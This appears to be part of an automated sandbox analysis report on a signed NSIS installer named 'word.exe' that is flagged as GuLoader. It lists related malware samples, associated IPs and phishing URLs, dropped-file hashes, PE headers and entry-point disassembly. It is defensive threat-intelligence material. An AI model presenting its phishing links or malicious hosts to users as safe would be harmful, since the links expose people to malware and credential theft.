                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: word.exe
                No simulations
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                186.2.171.76Scan_Docs#672910.exeGet hashmaliciousGuLoaderBrowse
                  Scan_docs#70778965.msiGet hashmaliciousUnknownBrowse
                    Scan_docs#.exeGet hashmaliciousUnknownBrowse
                      Scan_docs#.exeGet hashmaliciousUnknownBrowse
                        Scan_docs#04966311.msiGet hashmaliciousUnknownBrowse
                          32x.exeGet hashmaliciousUnknownBrowse
                            32x.exeGet hashmaliciousUnknownBrowse
                              32x.exeGet hashmaliciousUnknownBrowse
                                Scan_docs#.exeGet hashmaliciousUnknownBrowse
                                  Scan_docs#46445404.msiGet hashmaliciousUnknownBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    filedn.com964232908.emlGet hashmaliciousMeshAgentBrowse
                                    • 23.109.93.100
                                    http://filedn.comGet hashmaliciousUnknownBrowse
                                    • 23.109.93.100
                                    Kh25PMA7u8.exeGet hashmaliciousUnknownBrowse
                                    • 23.109.93.100
                                    https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5Get hashmaliciousHTMLPhisherBrowse
                                    • 23.109.93.100
                                    https://filedn.com/lt87R94Oi7NbcQdmzW2xPrR/link.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 23.109.93.100
                                    https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9maWxlZG4uY29tL2x0Q1JsWTNpVGNkN2RjM3UyUm1KdWFTL2xpbmsuaHRtbAGet hashmaliciousHTMLPhisherBrowse
                                    • 23.109.93.100
                                    https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffiledn.com%2flmtf06DxeexRuabg6razTLL%2ftestoff%2520%281%29.html&c=E,1,AUxv9bLRdb6z4Onh2l2O8FmlxAdL6LQVGldhTgR8KFlv8YvGIKyFlv1-hY-UfXjR3xzRRYwwojP0y6u691T3MUwR5XBYXeYy3z6tGYugygxG5A,,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                    • 23.109.93.100
                                    https://filedn.com/l4wKRwVCsRrpY3cYvATRAtF/Execl.html?email=ron@weasley.comGet hashmaliciousHTMLPhisherBrowse
                                    • 23.109.93.100
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    DDOS-GUARDCORPBZExeFile (305).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (323).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (347).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (349).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (369).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (367).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (371).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (378).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (384).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    ExeFile (394).exeGet hashmaliciousEmotetBrowse
                                    • 190.115.18.139
                                    LEMURIACOUSAo3sBU2bWe.lnkGet hashmaliciousROKRATBrowse
                                    • 74.120.9.90
                                    QSonyDwBPg.lnkGet hashmaliciousROKRATBrowse
                                    • 74.120.9.234
                                    ljsQG2l81U.lnkGet hashmaliciousROKRATBrowse
                                    • 74.120.9.234
                                    #Uc774#Uc0c1#Uc6a9.lnkGet hashmaliciousROKRATBrowse
                                    • 74.120.8.13
                                    https://u.pcloud.com/trackmail?url=aHR0cHM6Ly90cmFuc2Zlci5wY2xvdWQuY29tL2Rvd25sb2FkLmh0bWw/Y29kZT01WnhoUWlWWjQ4dFNYbnRoSktRWkUwamFaTnBHaTV0aWdKd2puZkh6dklqbW5CdUh1TWprWCM=&token=j7yZZ7ZpkZrwc0kENluc4wtObKMPkdF8xn5b07Get hashmaliciousUnknownBrowse
                                    • 74.120.8.6
                                    M6Y9BzeIBVGet hashmaliciousUnknownBrowse
                                    • 74.120.8.13
                                    M6Y9BzeIBVGet hashmaliciousUnknownBrowse
                                    • 74.120.9.233
                                    http://filedn.comGet hashmaliciousUnknownBrowse
                                    • 74.120.8.77
                                    9FajbP2iUgGet hashmaliciousCloudMensisBrowse
                                    • 74.120.9.90
                                    rokrat.bin.exeGet hashmaliciousROKRATBrowse
                                    • 74.120.8.15
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    c12f54a3f91dc7bafd92cb59fe009a35qaG6v7M0Nr.exeGet hashmaliciousUnknownBrowse
                                    • 186.2.171.76
                                    qaG6v7M0Nr.exeGet hashmaliciousUnknownBrowse
                                    • 186.2.171.76
                                    msedge_pwa_launcher.exeGet hashmaliciousUnknownBrowse
                                    • 186.2.171.76
                                    msedge_pwa_launcher.exeGet hashmaliciousUnknownBrowse
                                    • 186.2.171.76
                                    MsvL2pjs5Y.exeGet hashmaliciousAveMaria, WhiteSnake StealerBrowse
                                    • 186.2.171.76
                                    Scan_Docs#672910.exeGet hashmaliciousGuLoaderBrowse
                                    • 186.2.171.76
                                    Scan_docs#70778965.msiGet hashmaliciousUnknownBrowse
                                    • 186.2.171.76
                                    Scan_docs#.exeGet hashmaliciousUnknownBrowse
                                    • 186.2.171.76
                                    Scan_docs#04966311.msiGet hashmaliciousUnknownBrowse
                                    • 186.2.171.76
                                    32x.exeGet hashmaliciousUnknownBrowse
                                    • 186.2.171.76
                                    37f463bf4616ecd445d4a1937da06e194455.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 74.120.9.25
                                    Client.exeGet hashmaliciousXRed, XWormBrowse
                                    • 74.120.9.25
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 74.120.9.25
                                    file.exeGet hashmaliciousVidarBrowse
                                    • 74.120.9.25
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 74.120.9.25
                                    kahyts.exeGet hashmaliciousGuLoaderBrowse
                                    • 74.120.9.25
                                    FlashUpdates.jsGet hashmaliciousUnknownBrowse
                                    • 74.120.9.25
                                    mbdcKkZ3Ag.exeGet hashmaliciousGuLoaderBrowse
                                    • 74.120.9.25
                                    4h1Zc12ZBe.exeGet hashmaliciousStealcBrowse
                                    • 74.120.9.25
                                    FBS2024000000392.docxGet hashmaliciousUnknownBrowse
                                    • 74.120.9.25
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exeremittances.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dllremittances.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        js8call-2.2.0-win32.exeGet hashmaliciousUnknownBrowse
                                          Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            Revised PI_2024.exeGet hashmaliciousGuLoaderBrowse
                                              Revised PI_2024.exeGet hashmaliciousGuLoaderBrowse
                                                Revised PI_2024.exeGet hashmaliciousGuLoaderBrowse
                                                  Order 8391-6.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    Order 8391-6.exeGet hashmaliciousGuLoaderBrowse
                                                      SecuriteInfo.com.Trojan.NSIS.Agent.28595.14804.exeGet hashmaliciousGuLoaderBrowse
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):27
                                                        Entropy (8bit):4.2824842613426
                                                        Encrypted:false
                                                        SSDEEP:3:0kmvClSYjEJS:Vhr4k
                                                        MD5:B73A171C8DE922AFE4E446EC817FF4B3
                                                        SHA1:411D7496D75A03BFB66808B45987CAEC6223A7D5
                                                        SHA-256:F8BAA811A75E4E24939FB0D51A61DD0B6F4FE00DBA0171982D2F8FAE26F5A28C
                                                        SHA-512:5D6B439EDEA4B6650F17494C2076B8896909191B3EE11E382E73066592BF6C13F1EF7F7BD8CE777C80DAD172D998326A8FD0ACBD92B2DB8B2C223882497D1184
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:[Auto Clock]..Daily=False..
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):721136
                                                        Entropy (8bit):7.046029816291204
                                                        Encrypted:false
                                                        SSDEEP:12288:lm5S4Q+lciMbH00Tgv6w2vgTjl3M/Xi/ZrQHXEcR:lm5Sx4c9bHPTgv60dGS/cD
                                                        MD5:0EA4553778672B58BBD711FB039552C8
                                                        SHA1:8487F359428F19444696CE610ED81C6B4DD56A6A
                                                        SHA-256:910AE266EB8177AA46E2A2C77029E57B30D7AAA819C3B8451514BF1B1AE26F8D
                                                        SHA-512:E486DD7CB705E336C8B7E014B2DD53FAF881B74AADB6045D8FD73B59972F95DFBCFE1F58847C7D1D080849E86344FCEADB4AF3DE85F12D8374C966645C50DD2C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Joe Sandbox View:
                                                        • Filename: remittances.exe, Detection: malicious, Browse
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@.......................... ......f9....@..................................s.......p..................X'...........................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata...0...@...........................rsrc........p.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1567808
                                                        Entropy (8bit):3.388435624862763
                                                        Encrypted:false
                                                        SSDEEP:6144:pL9U1fBf0tLXYQ/pjJ3grr7h3EE22ysvDTChPfR1WnA5mye74fr28anGYbfSykV9:2BQYsjJgr/FewDER2ye8CkYb0ZjP
                                                        MD5:B08A2CFBE6796515E1ADC9EFBDEAF820
                                                        SHA1:60CC58ACDC3E9C074A84697838EAD34B90DADBDF
                                                        SHA-256:F9C7AC9AA68ED5CD1EAD5551F51EAAF3FBB0808E8F0EF0B71FA3021C5C827645
                                                        SHA-512:8533FB5FBC75201A16F4AB9DAE9F4B2AE99CC3446E83FD97E59F03B868C359AB8A8559E78B3A9B44A59D78DCD0B3C066886FA36B3C3A2C5A534AE7D509EAC940
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsh912A.tmp, Author: Joe Security
                                                        Reputation:low
                                                        Preview:........,.....................................................................................................$.............................................................................................................................................................................J...e...........5...j...............................................................................................................................<...........u...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11264
                                                        Entropy (8bit):5.779567759802416
                                                        Encrypted:false
                                                        SSDEEP:96:UPDYcJ+nx4vVp76JX7zBlkCg21Fxz4THxtrqw1at0JgwLEjo+OB3yUVCdl/wNj+l:UPtkuWJX7zB3kGwfy0nyUVsxCjOMb1u
                                                        MD5:883EFF06AC96966270731E4E22817E11
                                                        SHA1:523C87C98236CBC04430E87EC19B977595092AC8
                                                        SHA-256:44E5DFD551B38E886214BD6B9C8EE913C4C4D1F085A6575D97C3E892B925DA82
                                                        SHA-512:60333253342476911C84BBC1D9BF8A29F811207787FDD6107DCE8D2B6E031669303F28133FFC811971ED7792087FE90FB1FAABC0AF4E91C298BA51E28109A390
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: remittances.exe, Detection: malicious, Browse
                                                        • Filename: js8call-2.2.0-win32.exe, Detection: malicious, Browse
                                                        • Filename: Revised PI_2024.exe, Detection: malicious, Browse
                                                        • Filename: Revised PI_2024.exe, Detection: malicious, Browse
                                                        • Filename: Revised PI_2024.exe, Detection: malicious, Browse
                                                        • Filename: Revised PI_2024.exe, Detection: malicious, Browse
                                                        • Filename: Order 8391-6.exe, Detection: malicious, Browse
                                                        • Filename: Order 8391-6.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Trojan.NSIS.Agent.28595.14804.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....n3T...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text..._........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..b....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):536
                                                        Entropy (8bit):4.268605153256232
                                                        Encrypted:false
                                                        SSDEEP:12:8WFHRMlmST3x4DT2G+Ok4ssQNWK9agHuo:8cHut6TN+EshNN9ato
                                                        MD5:BE4F612D0B8E53593C17B98A99723CFE
                                                        SHA1:6A0AA334AD4BACF533313AC0AFCDA8B45C0BE6ED
                                                        SHA-256:CB480FAD6ED5ACE2139EC360E6A4BF19C4ED43E6DFC8378989589FB4AE8D6AC4
                                                        SHA-512:5E6AF163D65DA916D995CF6B0451EE5F2D6D4D258BEC81F0F10D7BD88B992C5CA7DD181CE0FAA31CBDDDC814EE0771B9CD657208120CE9E81147E091796FA958
                                                        Malicious:false
                                                        Preview:nonmiraculously bjrneklo christoffersen hermafroditternes besvarelserne.forfatternsket seasonings lkkeriernes stersskals laterites metanotum celoms folkereprsentantens semifast eddadigte udnyttelsesgrad toothpowder rejsemontr..entomologised unselfness batikskjorter complexer fedia..udlydskonsonanter lngdemaal bondebefolkningen feltoplysninger klimatiskes..besmykkelsens svanehalsene blyantstiften moonrises,forsorgspdagog decrying baglommen crinion flawedness statsvirksomheder anticyclical evighedsblomstens hypercatalexis bescreen..
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):374495
                                                        Entropy (8bit):1.245376539048548
                                                        Encrypted:false
                                                        SSDEEP:768:YTCY9kd5RgKrXDohIRNZW9BtgWoWTmygbuO8Ivi/4WipsLVl+ztq0hCZkBX2ZNQx:YT2IvomUti/2QZoMwhzOeDnVOh
                                                        MD5:91AB86EFCEF8A954283176E8D1FB277A
                                                        SHA1:459095BB62971DF047A40A6351B126A00BBE39A8
                                                        SHA-256:E402940C699100D4842127012B8389E57040D81630FAECFD5BC226945DF0C724
                                                        SHA-512:912A91D8398A0DD5358052153753C86CF293E95CBA2F06EF59E20250FA0ABDAA9C4D73CAAB94293060AD786D36887CBDAEFE0969935FCC3D29BF67540DFFEC67
                                                        Malicious:false
                                                        Preview:.......w.........4....................]........+.........]n..........;.....O...............................4...h.....................~............................................................................N...................................................a............x.............................................5............1.......-...................................S..........................P...............................................................................K...................&4.................H..................................&.........N...:k.3..............................................................i.................)..................`...........}...........................w...............Z.............................................Tv........................\................................G............................?....................................r................................................P.............................................
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):394571
                                                        Entropy (8bit):1.2517634765986003
                                                        Encrypted:false
                                                        SSDEEP:1536:lgSCQA0jZHWUm0LQ34A0GAphbeuI7rt/tCKK:ZCQA0jwUm0b5GA67RFFK
                                                        MD5:F0E68C57B3CC765BCA4535C863FEEFFB
                                                        SHA1:EDC71DFF1644C71948073B988B5B9C286D79AB7F
                                                        SHA-256:85D226BA6ECE9411F59066ACD17B8B0D7EF4C8D6183424C8B1722FDD856B9F30
                                                        SHA-512:844017EF8E9431F9DD962F6BF9EF6D12069903AE82C5F0B92DC9F4ED4F9CE425327DFC1370D1123DA6970A16FE7A86A352ECEA6217BCA4CEF5F8CF99447592FE
                                                        Malicious:false
                                                        Preview:D........+J..............v.............-.............................................................,........................9................................r.........................................................................................5................................................!....a.........{......z.............................`........................9..R......;............5..............................................=................f..............[...............d.............................@..j......'..............s..............B............@....N......................................................................,............@............................................u.......................................................i.......-..f...D............................._...........P......................................................o..........7..............:..............................................................................................
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):206209
                                                        Entropy (8bit):4.617348835922011
                                                        Encrypted:false
                                                        SSDEEP:3072:a5G61R18/J9GK2z5akj2H3RsAmn/E5T74fr2qIQan47Ybfjkrp:GR1WnA5mye74fr28anGYbfC
                                                        MD5:09D06FF74381984DBB4607A73DC23228
                                                        SHA1:43453C71DCA57123F1D0E6D6DE875DD6139E9C30
                                                        SHA-256:3DD6DC560DA426B32755B8CFABD3D30922069D0DA799CC87A2BC8E1EFD57D61D
                                                        SHA-512:ABA179A3FAE821113977D7E5F5D1A163D77F87F118DE3CAB50AE91267F2D034EFA7448B5717068E6085714DD51C6248E0B4393D931AC60E64B659ADC634952DC
                                                        Malicious:false
                                                        Preview:.........=...~~...#.............5........+...............|............I...............X...:.....E...''....RRR.....~..YY.D....||.".;.nn.......8..........................h..................+.........RR...........................Y..........mmmmmm.ccc.^^^.P..t............BBBB.................oo................................EE.........H.>.......... ................TT....e........x......s....0.//..u.=..[..........}}....................eee........................................88...88..h.SSS.....//....+...ss.!!..<....TTTT.ZZZZ........,,....\.....!!!!.....44...j...==.IIII....D.v....kk..NNNN.i.......aaaa...f....TT.....[.p....<..............2...rr...pp......?.................".`.....E.........................9....oo..i...............s.......ccc.^...................ppp...JJ.............}}.................\\..11.........cccc...........j.11.yy.....p.?........L.S...G.....p....b...........5..........TTTT........""""...............[[[[[[[[[[....................BB."".............k...4.U............
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):276174
                                                        Entropy (8bit):1.2506111113423
                                                        Encrypted:false
                                                        SSDEEP:768:8/vLZXBddeBzKuPGseNv/5mcdnIa6M2SxeG4Uzt17zGmvH9ICanlTL/E/5s/SyuJ:9SvdIcTzqHnpKEdBmIg
                                                        MD5:906C52BEDBBED70B5BFBC362478D3784
                                                        SHA1:DBB2F4007D172ACED50A9AF21CCAF2335DC1906A
                                                        SHA-256:005C018659AAAC011D7ED6C114F3E49411287B19AC7BE710D1ED235D6071D777
                                                        SHA-512:B1D080DC06235811B2B573188E15E1F9DD78CC561CA10C3F0474ACFA387D5C890E871BACE54734052F3CE4452A08BD01D6F4C3BC65123C5FB04763C18CABB733
                                                        Malicious:false
                                                        Preview:............s...................................................................)....D..............................U.......................................................*..............................................3h..............................................................................P........;.................P.................................r............@.......................j...z.......................@..n...............^..................................................................Y......}..................(............k..........]........g.....>.........t........-...................................................................%.......................)..................X.......................................................U...P..........4...................Q........8................................................#............c...M....................................................................................................e..........................
                                                        Process:C:\Users\user\Desktop\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):296460
                                                        Entropy (8bit):7.660304624051589
                                                        Encrypted:false
                                                        SSDEEP:3072:2mOUMar7v5gJYH91IZ4f0tLYd8XYCf/qoLappsZJ8vsgEoCUM623Wc45jLbitE2d:UU1fBf0tLXYQ/pjJ3grr7h3EE22y7
                                                        MD5:DAE47A82BCB84F449AE3CC1AAFD61320
                                                        SHA1:2CD6CB2AFF6E1B46A0488930E7B2283A87ABF5AE
                                                        SHA-256:BC97A3581BB801B273A1DCC18AF01AEC4A378070FD67F99DEAB1FC9A5BD54C9E
                                                        SHA-512:C36256D85C0441DA2590A5835E847A6EA1819A41047D7E136056F8C3DC0FC36299402AF8824CB417DABB88BE613BD48214A48298E09A7A6AA5D911A033D3B686
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\spherosome\preadoption\preembodiment\Unending.die, Author: Joe Security
                                                        Preview:.......b.........!..........~~~~....................]........%.....e.....S.................)))..........H.y....z......................(.........o............''...|...............7................c........]...............33.......................mm...........11.....B..ee..ttt..........................KKKKKKKK....FFF.*...............V............9.====.......M.._.......::............++++........ ....j....z.ccc............V............)))....................................................}}}.....WWWW..........t.....................................Y.........Q..EEEE./.......XX...222..BB......<..n...>>..R......................H..........!!.....w...............i.Y....G....e.///.gggg.........3...--..........R...."""""....-----..............J....nnnnn..........................~..................................vv............................55................`.........................4..}.....p............................z......s..<.%.||||......YY......r............GGGG..................?......
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.046029816291204
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:word.exe
                                                        File size:721'136 bytes
                                                        MD5:0ea4553778672b58bbd711fb039552c8
                                                        SHA1:8487f359428f19444696ce610ed81c6b4dd56a6a
                                                        SHA256:910ae266eb8177aa46e2a2c77029e57b30d7aaa819c3b8451514bf1b1ae26f8d
                                                        SHA512:e486dd7cb705e336c8b7e014b2dd53faf881b74aadb6045d8fd73b59972f95dfbcfe1f58847c7d1d080849e86344fceadb4af3de85f12d8374c966645c50dd2c
                                                        SSDEEP:12288:lm5S4Q+lciMbH00Tgv6w2vgTjl3M/Xi/ZrQHXEcR:lm5Sx4c9bHPTgv60dGS/cD
                                                        TLSH:92E4021BF34A5122ECA14B758DEBD32593683E022F02865F335EAB1E3D731625E4B65C
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@
                                                        Icon Hash:1070e0c282c2ca1c
                                                        Entrypoint:0x403217
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x54336EB1 [Tue Oct 7 04:40:17 2014 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f
                                                        Signature Valid:true
                                                        Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                        Signature Validation Error:The operation completed successfully
                                                        Error Number:0
                                                        Not Before, Not After
                                                        • 21/08/2024 14:11:55 21/08/2025 14:11:55
                                                        Subject Chain
                                                        • OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=Strategc Ltd, SERIALNUMBER=12011673, O=Strategc Ltd, L=London, C=GB
                                                        Version:3
                                                        Thumbprint MD5:E9D0FD1CF050F6EF1774D271AB839CB4
                                                        Thumbprint SHA-1:E098218628CF43BB0A0B14ADFD827402B403D9A3
                                                        Thumbprint SHA-256:A3EE59FBCA4388FEFC613B7CB3E2B67CF273BCEE3DB5CEDB1E0A8860D61DC04F
                                                        Serial:6065907A370AC3B27ABA472CD9F7ED3D
                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        xor ebx, ebx
                                                        push edi
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 00409130h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [00407034h]
                                                        push 00008001h
                                                        call dword ptr [004070B4h]
                                                        push ebx
                                                        call dword ptr [0040728Ch]
                                                        push 00000009h
                                                        mov dword ptr [004237B8h], eax
                                                        call 00007FA978EC7095h
                                                        mov dword ptr [00423704h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 0041ECB8h
                                                        call dword ptr [00407164h]
                                                        push 004091E4h
                                                        push 00422F00h
                                                        call 00007FA978EC6D3Fh
                                                        call dword ptr [004070B0h]
                                                        mov ebp, 00429000h
                                                        push eax
                                                        push ebp
                                                        call 00007FA978EC6D2Dh
                                                        push ebx
                                                        call dword ptr [00407118h]
                                                        cmp byte ptr [00429000h], 00000022h
                                                        mov dword ptr [00423700h], eax
                                                        mov eax, ebp
                                                        jne 00007FA978EC42DCh
                                                        mov byte ptr [esp+14h], 00000022h
                                                        mov eax, 00429001h
                                                        push dword ptr [esp+14h]
                                                        push eax
                                                        call 00007FA978EC67BDh
                                                        push eax
                                                        call dword ptr [00407220h]
                                                        mov dword ptr [esp+1Ch], eax
                                                        jmp 00007FA978EC4395h
                                                        cmp cl, 00000020h
                                                        jne 00007FA978EC42D8h
                                                        inc eax
                                                        cmp byte ptr [eax], 00000020h
                                                        je 00007FA978EC42CCh
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x2a480.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xad9980x2758
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x5bf40x5c0092032f5e50e74fe0fe80a33ba4ca92dbFalse0.6700067934782609data6.478210757314278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x70000x11ce0x12005801d712ecba58aa87d1e7d1aa24f3aaFalse0.4522569444444444OpenPGP Secret Key5.236122428806677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x90000x1a7f80x400f2470ac8847791744aff280e7e2f5353False0.615234375data5.025395707292401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x240000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x370000x2a4800x2a600706453fb128cb78c6b3ea873f5dee1afFalse0.1464498064159292data1.8972569486065036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x373580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishUnited States0.0786555069206199
                                                        RT_ICON0x47b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 2835 x 2835 px/mEnglishUnited States0.09131280218625185
                                                        RT_ICON0x510280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 2835 x 2835 px/mEnglishUnited States0.10097042513863216
                                                        RT_ICON0x564b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/mEnglishUnited States0.10108644307982995
                                                        RT_ICON0x5a6d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.11213692946058092
                                                        RT_ICON0x5cc800x213aPNG image data, 256 x 256, 8-bit gray+alpha, non-interlacedEnglishUnited States0.9934164119445098
